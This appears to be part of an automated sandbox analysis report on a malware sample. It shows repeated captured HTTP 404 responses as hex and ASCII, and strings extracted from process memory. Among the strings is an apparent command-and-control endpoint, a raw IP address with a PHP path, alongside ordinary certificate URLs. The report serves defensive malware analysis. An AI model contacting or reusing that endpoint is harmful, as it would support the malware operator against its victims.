72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ\|~B9=#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/W
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpB
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000D03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpg
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpm
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/ws
Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158i
Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
